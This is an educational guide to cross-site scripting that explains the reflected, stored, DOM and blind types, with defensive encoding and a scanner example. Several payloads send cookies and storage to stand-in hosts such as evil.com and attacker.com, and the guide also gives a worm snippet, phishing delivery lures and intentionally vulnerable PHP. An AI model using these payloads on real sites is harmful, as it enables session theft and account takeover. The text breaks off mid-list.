TABLE OF CONTENTS
1. Understanding XSS
2. Same Origin Policy & XSS Relationship
3. XSS Types Deep Dive
   - Reflected XSS
   - Stored XSS
   - DOM-Based XSS
   - Blind XSS
4. XSS Contexts & Exploitation
5. Advanced Exploitation Techniques
6. Attack Impact & Real-World Cases
7. Finding XSS Vulnerabilities
8. Testing Methodology
9. Prevention & Mitigation
1. UNDERSTANDING CROSS-SITE SCRIPTING (XSS)
What is XSS?
XSS is a security bug where a website allows an attacker to run their own JavaScript code in another user's browser.
The Core Concept

KEY UNDERSTANDING:
  XSS is NOT about attacking across different sites!
  It's about injecting and executing JavaScript
  WITHIN the SAME trusted site/origin.
  Think: "Content Injection", not "Cross-Site".

THE BROWSER'S PERSPECTIVE:
  If code comes FROM example.com, the browser TRUSTS it completely
  and gives it full access to:
  - Cookies & session tokens
  - LocalStorage & SessionStorage
  - DOM (entire page structure)
  - User's personal data
  - Making requests as the user

Why "Cross-Site Scripting" is a Misleading Name
COMMON MISCONCEPTION:
  "Attacker's script runs on attacker's site and attacks victim's site"

REALITY:
  "Attacker injects malicious script INTO victim's site.
  Script executes AS IF it belongs to victim's site.
  Browser treats it as legitimate site code."

BETTER NAMES WOULD BE:
  - "Same-Origin Script Injection"
  - "Malicious Content Injection"

2. SAME ORIGIN POLICY (SOP) & XSS RELATIONSHIP
What is Same Origin Policy?
Same Origin Policy is a browser security rule that prevents a website's JavaScript from accessing data of another website unless both have the same origin.
Origin Components
Origin = Scheme + Domain + Port

EXAMPLE:
  URL: https://example.com:443/page
  - Scheme: https
  - Domain: example.com
  - Port: 443 (default for HTTPS)
  Origin: https://example.com:443
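As an added example that is not part of the original page, the following computes the (scheme, host, port) tuple for the URLs this section uses and compares origins with the default port filled in, so that https://example.com:443 and https://example.com compare equal. It relies on the WHATWG URL API that Node.js and browsers provide.

```javascript
// Added example (not the page's own code): origin comparison as the browser
// performs it for the Same Origin Policy, written out explicitly.

const DEFAULT_PORTS = { 'http:': '80', 'https:': '443' };

// Returns { scheme, host, port }; the port is filled in from the scheme's
// default when the URL omits it (or names the default explicitly).
function originTuple(urlString) {
  const u = new URL(urlString);
  return {
    scheme: u.protocol,                       // e.g. 'https:'
    host: u.hostname,                         // e.g. 'example.com'
    port: u.port || DEFAULT_PORTS[u.protocol] || '',
  };
}

// All three components must match; path, query and fragment never matter.
function sameOrigin(a, b) {
  const x = originTuple(a);
  const y = originTuple(b);
  return x.scheme === y.scheme && x.host === y.host && x.port === y.port;
}

// Cross-check against the platform's own notion: URL.origin already drops
// the default port, so it must agree with sameOrigin for every pair.
function sameOriginViaApi(a, b) {
  return new URL(a).origin === new URL(b).origin;
}

// Constructed table built from the same/different origin lists in this section.
const BASE = 'https://example.com:443/page';
const CASES = [
  ['https://example.com/page1', true],
  ['https://example.com/page2', true],
  ['https://example.com/admin/panel', true],
  ['http://example.com', false],          // different scheme
  ['https://sub.example.com', false],     // different domain
  ['https://example.com:8080', false],    // different port
];

// True when both implementations agree with the expected verdict for every case.
function checkAll() {
  return CASES.every(([url, expected]) =>
    sameOrigin(BASE, url) === expected && sameOriginViaApi(BASE, url) === expected);
}
```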
SAME ORIGIN EXAMPLES:
  - https://example.com/page1
  - https://example.com/page2
  - https://example.com/admin/panel
DIFFERENT ORIGIN EXAMPLES:
  - http://example.com (different scheme)
  - https://sub.example.com (different domain)
  - https://example.com:8080 (different port)

SOP Rules & Restrictions
WHAT SOP BLOCKS:
  - Reading content from a different origin
  - Accessing cookies from a different domain
  - Reading localStorage from a different origin
  - Making authenticated requests cross-origin
  - Reading response data cross-origin
WHAT SOP ALLOWS:
  - Loading images: <img src="other-origin">
  - Loading scripts: <script src="other-origin">
  - Loading styles: <link href="other-origin">
  - Loading videos: <video src="other-origin">
  - Sending POST requests (but the response can't be read)
  - Form submissions to different origins

How XSS Bypasses Same Origin Policy
THE XSS BYPASS MECHANISM:

NORMAL SCENARIO (SOP protected):
  attacker.com's script tries to read victim.com's cookies
  -> BLOCKED by Same Origin Policy

XSS SCENARIO (SOP bypassed):
  1. Attacker injects malicious code INTO victim.com
  2. Malicious code is served FROM victim.com (trusted origin)
  3. Browser sees: "This is victim.com's own code" -> FULL TRUST
  4. Script has complete access:
     - Read cookies
     - Access localStorage
     - Modify DOM
     - Make authenticated requests
     - Read sensitive data

KEY POINT:
  XSS doesn't technically "bypass" SOP; it works WITHIN the target origin!

Visual: SOP vs XSS
SAME ORIGIN POLICY:
  attacker.com's script tries to read victim.com's data (cookies, storage)
  -> BLOCKED. SOP working, attack prevented.

XSS - SOP CIRCUMVENTION:
  attacker.com crafts a payload and injects it into victim.com.
  The injected <script>steal_cookies()</script> now runs inside victim.com;
  the browser says "this is MY code" and grants full access to all resources.
  -> Attack successful: XSS bypassed SOP.

3. XSS TYPES - DEEP DIVE
XSS Classification Matrix

XSS VULNERABILITY TYPES
BY DATA FLOW:
  - Server-Side XSS
    - Reflected XSS (Non-Persistent)
    - Stored XSS (Persistent)
  - Client-Side XSS
    - DOM-Based XSS
BY EXECUTION CONTEXT:
  - HTML Context
  - Attribute Context
  - JavaScript Context
  - URL Context
  - CSS Context
BY DETECTION METHOD:
  - Regular XSS (visible response)
  - Blind XSS (invisible to attacker)

1. REFLECTED XSS (NON-PERSISTENT)
Definition
Reflected Cross-Site Scripting happens when a website takes user input from a request (like a URL or form) and shows it back in the response without proper security checks, allowing malicious scripts to run instantly.
How It Works

ATTACK FLOW:
  1. Attacker crafts a malicious URL with the payload.
  2. Attacker sends the link via email phishing, social media or malicious ads.
  3. Victim clicks the malicious link; the browser sends
     GET /search?q=<script>evil()</script>
  4. Server reflects the input in the response:
     <p>You searched for: <script>evil()</script></p>
  5. Victim's browser executes the malicious script.
  6. Attacker receives the stolen data (cookies, session).

Real-World Example from PortSwigger
A website's search function receives the user-supplied search term in a URL parameter, and if the application doesn't perform proper processing, an attacker can construct an attack by injecting script tags.
Vulnerable Code

<!-- VULNERABLE SEARCH PAGE -->
<?php
// search.php
$searchTerm = $_GET['search'] ?? '';
?>
<!DOCTYPE html>
<html>
<head>
  <title>Search Results</title>
</head>
<body>
  <h1>Search Results</h1>
  <p>You searched for: <?php echo $searchTerm; ?></p>
  <!-- VULNERABILITY: Direct output without encoding -->
</body>
</html>

Normal Request
URL: https://example.com/search.php?search=laptop
Response:
<p>You searched for: laptop</p>
Result: works as expected

Malicious Request
URL: https://example.com/search.php?search=<script>alert(document.cookie)</script>
Response:
<p>You searched for: <script>alert(document.cookie)</script></p>
Result:
  - JavaScript executes!
  - Cookie theft possible
  - Session hijacking risk

Common Injection Points
1. SEARCH PARAMETERS:
   /search?q=<payload>
   /products?search=<payload>
   /users?name=<payload>
2. ERROR MESSAGES:
   /login?error=<payload>
   /404?page=<payload>
   /message?text=<payload>
3. INPUT REFLECTION:
   /welcome?name=<payload>
   /profile?user=<payload>
   /comment?text=<payload>
4. REDIRECT PARAMETERS:
   /redirect?url=javascript:alert(1)
   /goto?next=<payload>
5. TRACKING PARAMETERS:
   /page?ref=<payload>
   /article?from=<payload>
6. FILTER PARAMETERS:
   /list?filter=<payload>
   /results?category=<payload>

Attack Delivery Methods
1. EMAIL PHISHING:
   Subject: "Your Account Has Been Locked!"
   Body: "Click here to verify:
   http://bank.com/login?error=<script>...</script>"
2. SOCIAL ENGINEERING:
   "Check out this funny video!"
   -> bit.ly/xyz -> vulnerable site with payload
3. SMS PHISHING (SMISHING):
   "Your package is ready:
   http://shipping.com/track?id=<script>...</script>"
4. IN-GAME MESSAGES:
   Chat message with malicious link
5. FORUM/BLOG COMMENTS:
   Post contains shortened URL with payload
6. MALICIOUS ADVERTISEMENTS:
   Ad banner with XSS link
7. QR CODES:
   QR code -> vulnerable URL with payload

Characteristics
  + Non-persistent (temporary)
  + Requires victim interaction (click link)
  + Payload in URL/request parameters
  + Immediate reflection in HTTP response
  + One-time execution per victim
  + Server-side vulnerability
  - Does not affect all users
  - Lower impact than Stored XSS

Severity Assessment
REFLECTED XSS IMPACT:
  Depends on:
    - Application sensitivity
    - User privileges
    - Session token exposure
    - Data accessibility
  LOW RISK SCENARIOS:
    - Public information sites
    - No authentication required
    - No sensitive data
  MEDIUM RISK SCENARIOS:
    - Authenticated applications
    - User profile access
    - Limited sensitive data
  HIGH RISK SCENARIOS:
    - Banking/financial sites
    - Admin panels
    - Healthcare applications
    - Government portals

2. STORED XSS (PERSISTENT XSS)
Definition
Stored Cross-Site Scripting is a vulnerability in which malicious script code is permanently stored by an application and executed automatically in users' browsers whenever the affected content is accessed.
Why It's Called "Second-Order" XSS

"SECOND-ORDER" EXPLANATION:
  FIRST ORDER (Reflected XSS):
    Request -> Server -> Response -> Execute
    (single interaction)
  SECOND ORDER (Stored XSS):
    Request -> Server -> Database -> [time passes] ->
    Retrieve -> Response -> Execute
    (two separate interactions)
  The payload is:
    1. Stored first (order 1)
    2. Retrieved and executed later (order 2)

Complete Attack Flow
STORED XSS ATTACK LIFECYCLE

PHASE 1: INJECTION
  Attacker submits a malicious comment/post:
    <script>fetch('https://evil.com/steal?c='+document.cookie)</script>
  Web server: no validation/sanitization, stores it "as-is".
  Database, comments table:
    user: "attacker"
    text: "<script>...</script>"
  INFECTION COMPLETE

PHASE 2: PROPAGATION (could be hours/days later)
  Victim #1, Victim #2 and Victim #3 each view the page.
  The web server retrieves the comment from the database, which returns the
  malicious payload, and embeds it in the HTML response (no encoding):
    <div class="comment">
      <script>
        fetch('https://evil.com/steal?c=' + document.cookie);
      </script>
    </div>
  Victim #1, #2 and #3: infected! (cookies sent)

PHASE 3: EXPLOITATION
  Attacker's server (evil.com) receives the stolen data:
    Victim #1: session=abc123...
    Victim #2: session=def456...
    Victim #3: session=ghi789...
  Attacker uses the stolen sessions.
  COMPLETE ACCOUNT TAKEOVER

Real-World Example
<!-- VULNERABLE BLOG COMMENT SYSTEM -->
<!-- 1. Comment Submission (comment_submit.php) -->
<?php
// Assumes $db is an already-open mysqli connection (not shown on the page).
// VULNERABILITY: No input validation
$comment  = $_POST['comment'];
$username = $_POST['username'];
$post_id  = $_POST['post_id'];
// Store in database (string-built query; also SQL-injectable, kept as the page shows it)
$query = "INSERT INTO comments (username, text, post_id)
          VALUES ('$username', '$comment', $post_id)";
mysqli_query($db, $query);
header('Location: post.php?id=' . $post_id);
?>
<!-- 2. Comment Display (post.php) -->
<?php
$post_id = $_GET['id'];
// Retrieve comments from database
$query  = "SELECT username, text FROM comments WHERE post_id = $post_id";
$result = mysqli_query($db, $query);
while ($comment = mysqli_fetch_assoc($result)) {
    // VULNERABILITY: Direct output without encoding
    echo '<div class="comment">';
    echo '<strong>' . $comment['username'] . ':</strong><br>';
    echo $comment['text']; // XSS HERE!
    echo '</div>';
}
?>

Attack Scenario
STEP 1: ATTACKER'S PAYLOAD
  Form input:
    Username: John Doe
    Comment: Great article!
      <script>
      new Image().src='https://attacker.com/steal.php?c='+document.cookie;
      </script>

STEP 2: STORED IN DATABASE
  Database entry:
  | id | username | text                                |
  |----|----------|-------------------------------------|
  | 42 | John Doe | Great article! <script>...</script> |

STEP 3: EVERY VIEWER GETS INFECTED
  When ANY user views the post:
    <div class="comment">
      <strong>John Doe:</strong><br>
      Great article!
      <script>
      new Image().src='https://attacker.com/steal.php?c='+document.cookie;
      </script>
    </div>
  RESULT:
    - Script executes in victim's browser
    - Cookie sent to attacker's server
    - Session hijacked
    - Account compromised
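The fix for both search.php (reflected) and post.php (stored) above is the same: HTML-encode untrusted data at the point where it is written into the page. The following is an added example, not the page's own code, written in JavaScript so the result can be checked offline (the PHP equivalent is htmlspecialchars($s, ENT_QUOTES, 'UTF-8')); the search term and comment row it renders are constructed from the attack scenarios above.

```javascript
// Added example (not the page's own code): output encoding for the HTML body
// context, applied to the reflected search page and the stored comment view.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
};

// Encodes untrusted text for the HTML body and quoted-attribute contexts.
// A single-pass replace means '&' is never double-encoded.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Reflected case: the search page, with the term encoded at the output point.
function renderSearchPage(searchTerm) {
  return `<h1>Search Results</h1>\n<p>You searched for: ${escapeHtml(searchTerm)}</p>`;
}

// Stored case: one comment row as post.php reads it back from the database.
// Encoding on output means it does not matter what was stored.
function renderComment(row) {
  return `<div class="comment"><strong>${escapeHtml(row.username)}:</strong><br>` +
    `${escapeHtml(row.text)}</div>`;
}

// Constructed inputs taken from the attack scenarios above.
const REFLECTED_PAYLOAD = '<script>alert(document.cookie)</script>';
const STORED_ROW = {
  id: 42,
  username: 'John Doe',
  text: "Great article!\n<script>\nnew Image().src='https://attacker.com/steal.php?c='+document.cookie;\n</script>",
};

// True when the rendered HTML contains no tag other than the template's own,
// i.e. every '<' that came from user data was turned into '&lt;'.
function onlyTemplateTags(html) {
  const stripped = html.replace(/<\/?(h1|p|div|strong|br)\b[^>]*>/g, '');
  return !stripped.includes('<');
}
```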
Common Stored XSS Locations

HIGH-RISK STORAGE LOCATIONS:
1. COMMENT SYSTEMS:
   - Blog comments
   - Product reviews
   - Forum posts
   - Discussion threads
   - Article comments
2. USER PROFILES:
   - Bio/About section
   - Display name
   - Status messages
   - Profile description
   - Signature
   - Location/hometown
3. MESSAGING SYSTEMS:
   - Private messages
   - Chat applications
   - Internal messaging
   - Support tickets
   - Email-like systems
4. CONTENT MANAGEMENT:
   - Wiki pages
   - Documentation
   - User-generated articles
   - Blog posts
   - Product descriptions
5. FILE METADATA:
   - Filename
   - File description
   - Author name
   - Title
   - Tags/categories
6. FORM SUBMISSIONS:
   - Contact forms
   - Feedback forms
   - Survey responses
   - Registration forms
   - Application forms
7. TAGS & CATEGORIES:
   - Hashtags
   - Product tags
   - Custom categories
   - User-defined labels
8. LOGGING & ANALYTICS:
   - Error logs (displayed to admins)
   - Activity logs
   - Audit trails
   - Report comments
9. E-COMMERCE:
   - Product names
   - Order notes
   - Shipping addresses
   - Gift messages
   - Wishlist names
10. GAMING PLATFORMS:
   - Player names
   - Clan descriptions
   - Game chat
   - Achievement names
   - Custom game modes

Stored XSS: The Worm Potential
SELF-PROPAGATING XSS WORM:

BASIC CONCEPT:
  1. Victim views infected content
  2. Malicious script executes
  3. Script posts ITSELF as new content
  4. Next victim views it
  5. Repeat -> exponential spread!

SIMPLIFIED WORM CODE:
<script>
// The worm payload
var wormCode = '<script src="https://evil.com/worm.js"><\/script>';
// Post payload as new comment
fetch('/api/comment', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({
    text: 'Check this out! ' + wormCode
  })
});
</script>

SPREAD TIMELINE:
  Minute 1: infects 1 user
  Minute 5: 10 users infected
  Minute 15: 100 users infected
  Minute 30: 1,000 users infected
  Hour 1: 10,000+ users infected

Famous Example: Samy Worm (MySpace, 2005)
REAL-WORLD WORM ATTACK:
  Platform: MySpace (2005)
  Attacker: Samy Kamkar
WHAT IT DID:
  - Added "Samy is my hero" to profiles
  - Added Samy as friend
  - Copied itself to infected profiles
  - Spread to their friends
TIMELINE:
  - Started: single profile
  - 20 hours later: 1 MILLION profiles infected
  - Result: MySpace shut down temporarily
IMPACT:
  + Proved XSS worms are a real threat
  + Exponential propagation demonstrated
  + No user interaction needed
  + Automatic self-replication

Why Stored XSS is Most Dangerous
The key difference between reflected and stored XSS is that stored XSS enables attacks that are self-contained within the application itself, with the attacker placing their exploit into the application and simply waiting for users to encounter it.
REFLECTED vs STORED XSS COMPARISON

Feature          | Reflected XSS | Stored XSS
-----------------|---------------|------------------
Persistence      | Temporary     | Permanent
User action      | Click link    | None needed
Victim count     | 1-100s        | 1000s-millions
Attack duration  | One-time      | Until removed
Detection        | URL visible   | Hidden in DB
Social eng.      | Required      | Not needed
Attack surface   | Limited       | Widespread
Worm potential   | No            | Yes
Remediation      | Easy          | Complex
DANGER LEVEL     | MEDIUM        | CRITICAL

IMPACT MULTIPLIER:
  Reflected: 1-10 victims typical
  Stored: 1,000-1,000,000+ victims possible
TIME TO DETECTION:
  Reflected: minutes to hours
  Stored: days to months (often discovered by users!)

Characteristics
  + Persistent (permanently stored)
  + No victim interaction required
  + Affects ALL users viewing content
  + Can propagate as worm
  + Long-term infection
  + Server-side vulnerability
  Hardest to detect and remove
  Highest impact of all XSS types
  MOST DANGEROUS XSS VARIANT

3. DOM-BASED XSS (CLIENT-SIDE XSS)
Definition
DOM-Based Cross-Site Scripting is a client-side vulnerability where malicious script code is executed due to unsafe handling of data within the browser's Document Object Model, without direct involvement of the server.
What Makes DOM XSS Different

KEY DIFFERENCE:

TRADITIONAL XSS (Reflected/Stored):
  Browser -> Server (sees payload)
  -> Server processes
  -> Server includes in response
  -> Browser receives & executes
  Payload visible in server logs
  Can be detected by WAF/IDS

DOM-BASED XSS:
  Browser -> Server
  -> Server sends CLEAN HTML
  -> Browser receives clean page
  -> JavaScript processes URL
  -> JavaScript manipulates DOM
  -> Malicious code executes
  Server NEVER sees payload
  Server logs show nothing
  WAF/IDS completely bypassed
  Entirely client-side attack

Sources and Sinks
Sources (where attacker-controlled data comes from)
// URL-based sources (most common)
location.href         // Full URL
location.search       // Query string: ?param=value
location.hash         // Fragment: #anchor
location.pathname     // Path: /page/subpage
// Document sources
document.URL          // Full URL
document.documentURI  // Document URI
document.baseURI      // Base URI
document.referrer     // Referring page
// Storage sources
localStorage.getItem('key')
sessionStorage.getItem('key')
// Other sources
window.name           // Window name
document.cookie       // Cookies
history.pushState()   // History API

Sinks (where data becomes dangerous)
// DOM manipulation sinks (MOST COMMON)
element.innerHTML = source;               // VERY DANGEROUS
element.outerHTML = source;               // DANGEROUS
document.write(source);                   // DANGEROUS
document.writeln(source);                 // DANGEROUS
// Script execution sinks
eval(source);                             // CRITICAL
setTimeout(source, time);                 // DANGEROUS
setInterval(source, time);                // DANGEROUS
Function(source)();                       // DANGEROUS
new Function(source)();                   // DANGEROUS
// URL sinks
location = source;                        // DANGEROUS
location.href = source;                   // DANGEROUS
location.assign(source);                  // DANGEROUS
location.replace(source);                 // DANGEROUS
window.location = source;                 // DANGEROUS
window.open(source);                      // DANGEROUS
// jQuery sinks
$(source);                                // DANGEROUS (jQuery selector)
$('div').html(source);                    // DANGEROUS
$('div').append(source);                  // DANGEROUS
$('div').prepend(source);                 // DANGEROUS
// HTML5 sinks
element.insertAdjacentHTML(pos, source);  // DANGEROUS
postMessage(source, '*');                 // can be dangerous

Complete DOM XSS Attack Flow
DOM-BASED XSS ATTACK FLOW

STEP 1: ATTACKER CRAFTS URL
  URL: https://example.com/page#<img src=x onerror=alert(1)>
  The fragment (#...) is never sent to the server.

STEP 2: VICTIM CLICKS LINK
  Browser sends:
    GET /page HTTP/1.1
    Host: example.com
  Note: the fragment is NOT included in the HTTP request!

STEP 3: SERVER RESPONSE (clean!)
  HTTP/1.1 200 OK
  <!DOCTYPE html>
  <html>
  <body>
    <div id="content"></div>
    <script src="app.js"></script>   <!-- contains the vulnerable code -->
  </body>
  </html>
  The server has NO IDEA about the payload in the URL fragment.

STEP 4: JAVASCRIPT PROCESSES URL
  // app.js (vulnerable code)
  var content = location.hash.substring(1);                // reads fragment
  document.getElementById('content').innerHTML = content;  // writes to DOM

STEP 5: DOM UPDATED WITH MALICIOUS CONTENT
  <div id="content">
    <img src=x onerror=alert(1)>   <!-- injected by JavaScript -->
  </div>

STEP 6: BROWSER EXECUTES
  Image fails to load -> onerror event fires -> JavaScript runs!
  XSS SUCCESSFUL

KEY POINTS:
  + Server logs show: GET /page (clean request)
  + No payload visible in server logs
  + WAF cannot detect it
  + IDS cannot block it
  + Completely client-side attack

Real-World Vulnerable Code Patterns
Pattern 1: Classic innerHTML Sink
// Vulnerable code
function displayWelcome() {
  var name = location.hash.substring(1);
  document.getElementById('welcome').innerHTML = 'Hello ' + name;
}
// Attack URL:
https://site.com/#<img src=x onerror=alert(document.cookie)>
// Result: cookie theft

Pattern 2: document.write() Vulnerability
// Vulnerable code
var queryParam = location.search.substring(1);
document.write('<div>Search: ' + queryParam + '</div>');
// Attack URL:
https://site.com/?</div><script>alert(1)</script>
// Breaks out of the div and executes the script

Pattern 3: jQuery Selector Injection
// Vulnerable code
var elementId = location.hash;
$(elementId).hide();
// Attack URL:
https://site.com/#<img src=x onerror=alert(1)>
// jQuery interprets the value as HTML, not as a selector!

Pattern 4: eval() with URL Data
// Vulnerable code
var callback = new URLSearchParams(location.search).get('callback');
eval(callback + '()');
// Attack URL:
https://site.com/?callback=alert(1);void
// Direct JavaScript execution

Pattern 5: Location Assignment
// Vulnerable code
var redirect = location.hash.substring(1);
location.href = redirect;
// Attack URL:
https://site.com/#javascript:alert(1)
// The javascript: protocol executes

Pattern 6: Base64 Encoding (False Security)
// Vulnerable code (developers think encoding = security)
var userData = atob(location.hash.substring(1));
document.getElementById('profile').innerHTML = userData;
// Attack:
// Payload: <img src=x onerror=alert(1)>
// Base64: PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
// URL: https://site.com/#PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==
// Still executes! Encoding is not security
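As an added example that is not part of the original page, the following is a small source-to-sink scanner built from the source and sink lists in the previous section and run over the six vulnerable patterns above. It does simplified per-line taint tracking (a variable assigned from a source is tainted; a tainted value reaching a sink is reported), which is the idea behind DOM Invader and DOM-aware SAST tools in miniature; the app.js it scans is constructed from the patterns above, and a textContent write is included to show that a sink-free use of a source is not flagged.

```javascript
// Added example (not the page's own code): a teaching-grade DOM XSS scanner.
// Per-line, regex-based taint tracking over the page's source and sink lists.

const DOM_SOURCES = [
  'location.href', 'location.search', 'location.hash', 'location.pathname',
  'document.URL', 'document.documentURI', 'document.baseURI', 'document.referrer',
  'window.name', 'document.cookie', 'localStorage.getItem', 'sessionStorage.getItem',
];

// Each regex captures the expression that reaches the sink in group 1.
const DOM_SINKS = [
  { name: 'innerHTML', re: /\.innerHTML\s*=(?!=)\s*(.+)/ },
  { name: 'outerHTML', re: /\.outerHTML\s*=(?!=)\s*(.+)/ },
  { name: 'document.write', re: /document\.write(?:ln)?\s*\((.+)\)/ },
  { name: 'eval', re: /\beval\s*\((.+)\)/ },
  { name: 'setTimeout/setInterval', re: /\bset(?:Timeout|Interval)\s*\((.+)\)/ },
  { name: 'Function', re: /\bFunction\s*\((.+)\)/ },
  { name: 'location', re: /\b(?:window\.)?location(?:\.href)?\s*=(?!=)\s*(.+)/ },
  { name: 'location.assign/replace', re: /\blocation\.(?:assign|replace)\s*\((.+)\)/ },
  { name: 'jQuery $()', re: /\$\s*\((.+)\)/ },
  { name: 'jQuery html/append/prepend', re: /\.(?:html|append|prepend)\s*\((.+)\)/ },
  { name: 'insertAdjacentHTML', re: /\.insertAdjacentHTML\s*\([^,]*,\s*(.+)\)/ },
];

// An expression is tainted if it names a source directly or uses a tainted variable.
function isTainted(expr, tainted) {
  if (DOM_SOURCES.some((s) => expr.includes(s))) return true;
  return [...tainted].some((v) => new RegExp('\\b' + v.replace(/\$/g, '\\$') + '\\b').test(expr));
}

// Returns [{ line, sink, code }] for every sink fed by attacker-controlled data.
function scanForDomXss(jsSource) {
  const tainted = new Set();
  const findings = [];
  jsSource.split('\n').forEach((raw, idx) => {
    const line = raw.replace(/(^|\s)\/\/.*$/, '').trim();  // drop trailing comments
    if (!line) return;
    // Simple assignment: var/let/const <name> = <expr>; taint propagates to <name>.
    const assign = line.match(/^(?:(?:var|let|const)\s+)?([A-Za-z_$][\w$]*)\s*=(?!=)\s*(.+)$/);
    if (assign && isTainted(assign[2], tainted)) tainted.add(assign[1]);
    for (const sink of DOM_SINKS) {
      const m = line.match(sink.re);
      if (m && isTainted(m[1], tainted)) {
        findings.push({ line: idx + 1, sink: sink.name, code: raw.trim() });
      }
    }
  });
  return findings;
}

// Constructed sample app.js mirroring the six vulnerable patterns above,
// plus one safe textContent write that must not be reported.
const SAMPLE_APP_JS = `
// constructed sample that mirrors the six vulnerable patterns above
function displayWelcome() {
  var name = location.hash.substring(1);
  document.getElementById('welcome').innerHTML = 'Hello ' + name;
}
var queryParam = location.search.substring(1);
document.write('<div>Search: ' + queryParam + '</div>');
var elementId = location.hash;
$(elementId).hide();
var callback = new URLSearchParams(location.search).get('callback');
eval(callback + '()');
var redirect = location.hash.substring(1);
location.href = redirect;
var userData = atob(location.hash.substring(1));
document.getElementById('profile').innerHTML = userData;
// safe: textContent never parses markup
var safeName = location.hash.substring(1);
document.getElementById('safe').textContent = safeName;
`;
```

Running scanForDomXss(SAMPLE_APP_JS) reports six findings, one per pattern, and nothing for the textContent line; a real tool additionally follows data across functions, string transforms and framework templates, which this line-by-line version does not.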
Detection Challenges

WHY DOM XSS IS HARD TO FIND:
  - Not in HTTP request/response
    - Server logs show nothing
    - WAF cannot inspect
    - IDS cannot detect
  - Client-side only
    - Requires JavaScript analysis
    - Dynamic code flows
    - Framework-dependent
  - Complex data flows
    - Source -> Transform -> Sink
    - Multiple intermediate steps
    - Obfuscated code
  Requires specialized tools:
    - Browser dev tools
    - DOM Invader (Burp Suite)
    - DAST tools with browser engines
    - Manual code review

Characteristics
  + Entirely client-side
  + Payload in URL fragment (#)
  + Server never sees malicious data
  + JavaScript processes the payload
  + Bypasses server-side security
  + Bypasses WAF/IDS completely
  - Hard to detect with traditional tools
  - Requires JavaScript code audit
  STEALTHIEST XSS TYPE

4. BLIND XSS
Definition
Blind Cross-Site Scripting is a type of XSS vulnerability where injected script code executes in a hidden or restricted part of an application, such as admin panels, log viewers, or backend systems, and the attacker does not see the result directly.
What Makes Blind XSS Special

REGULAR XSS:
  - Attacker injects payload
  - Attacker sees immediate result
  - Instant feedback
BLIND XSS:
  - Attacker injects payload
  - No immediate feedback
  - Payload stored in system
  - Executes later (hours/days)
  - In a different location (admin panel)
  - Attacker notified via callback

Attack Flow
PHASE 1: INJECTION (public area)
  Attacker submits the payload in:
    - Contact form
    - Support ticket
    - User feedback
    - Error report
  The application database stores the payload.
  WAITING GAME (could be hours or days)

PHASE 2: EXECUTION (private area)
  An admin/staff member logs into the backend and views the submitted data.
  The backend system retrieves the payload from the DB and displays it without encoding.
  The admin's browser EXECUTES THE PAYLOAD.
  The attacker's server receives the callback:
    - Admin's cookies
    - Session tokens
    - Backend URL
    - Screenshots
  HIGH-VALUE TARGET COMPROMISED

Blind XSS Payload Structure
// Standard Blind XSS payload with callback
<script>
// Collect information
var data = {
  url: window.location.href,
  cookies: document.cookie,
  localStorage: JSON.stringify(localStorage),
  sessionStorage: JSON.stringify(sessionStorage),
  dom: document.documentElement.outerHTML
};
// Exfiltrate to attacker's server
fetch('https://attacker.com/blind-xss', {
  method: 'POST',
  body: JSON.stringify(data)
});
// Or use an Image beacon (more stealthy)
new Image().src = 'https://attacker.com/xss?data=' + btoa(JSON.stringify(data));
</script>

Common Blind XSS Locations
HIGH-VALUE TARGETS:
1. ADMIN PANELS:
   - View user submissions
   - Review support tickets
   - Manage user accounts
2. LOG VIEWERS:
   - Error logs
   - Activity logs
   - Audit trails
   - Analytics dashboards
3. SUPPORT SYSTEMS:
   - Ticket management
   - Help desk software
   - Customer feedback
4. EMAIL SYSTEMS:
   - Webmail interfaces
   - Email administration
   - Marketing platforms
5. NOTIFICATION CENTERS:
   - Admin notifications
   - Alert systems
   - Real-time monitors
6. REPORTING TOOLS:
   - Business intelligence
   - Data visualization
   - Export functions
7. SEARCH RESULTS:
   - Admin search
   - Internal search tools
   - Content indexing
8. USER MANAGEMENT:
   - Profile viewers
   - Account details
   - User statistics

Testing for Blind XSS
The best tool for blind XSS testing is XSS Hunter, which provides callback infrastructure.
TESTING STRATEGY:
  1. Identify all input points
  2. Insert unique blind XSS payloads
  3. Wait for callback notifications
  4. Analyze results

EXAMPLE TESTING FLOW - INPUT FIELDS TO TEST:
  [ ] Contact form - Name field
  [ ] Contact form - Email field
  [ ] Contact form - Message field
  [ ] Support ticket - Subject
  [ ] Support ticket - Description
  [ ] Feedback form - Comments
  [ ] Bug report - Title
  [ ] Bug report - Steps to reproduce
  [ ] Profile - Bio section
  [ ] Profile - Display name
  [ ] File upload - Filename
  [ ] HTTP headers - User-Agent
  [ ] HTTP headers - Referer

Why Blind XSS is Dangerous
IMPACT MULTIPLIER:
  - Targets privileged users (admins/staff)
  - Access to sensitive systems
  - Higher privilege accounts
  - Internal network access
  - More sensitive data
  - Greater impact per victim
RISK FACTORS:
  + Admin/staff privileges
  + Access to all user data
  + System configuration access
  + Can modify platform settings
  + Can affect all users
  COMPLETE PLATFORM COMPROMISE

Characteristics
  + No immediate feedback to attacker
  + Payload stored in system
  + Executes in a different context (backend)
  + Targets high-privilege users
  + Requires callback mechanism
  + Hard to test without tools
  HIGH-VALUE TARGETS
  POTENTIALLY MOST IMPACTFUL

4. XSS CONTEXTS & EXPLOITATION
Understanding Execution Contexts

KEY CONCEPT:
  "Context" = WHERE your input lands in the HTML/JavaScript.
  Different contexts require different payloads!
  Context determines:
    - What characters are dangerous
    - How to break out
    - Which payload will work
    - How to bypass filters

1. HTML CONTEXT
When input lands directly in HTML body:
<!-- Normal Response -->
<div>Welcome, User123</div>
<!-- Vulnerable Code -->
<div>Welcome, [USER_INPUT]</div>
<!-- Attack -->
<div>Welcome, <script>alert(1)</script></div>

Exploitation Payloads:
<!-- Classic Script Tag -->
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
<script src="https://evil.com/xss.js"></script>
<!-- Image Tag with Error Handler -->
<img src=x onerror=alert(1)>
<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>
<!-- SVG -->
<svg onload=alert(1)>
<svg><script>alert(1)</script></svg>
<svg><animatetransform onbegin=alert(1)>
<!-- Other Tags -->
<iframe src="javascript:alert(1)">
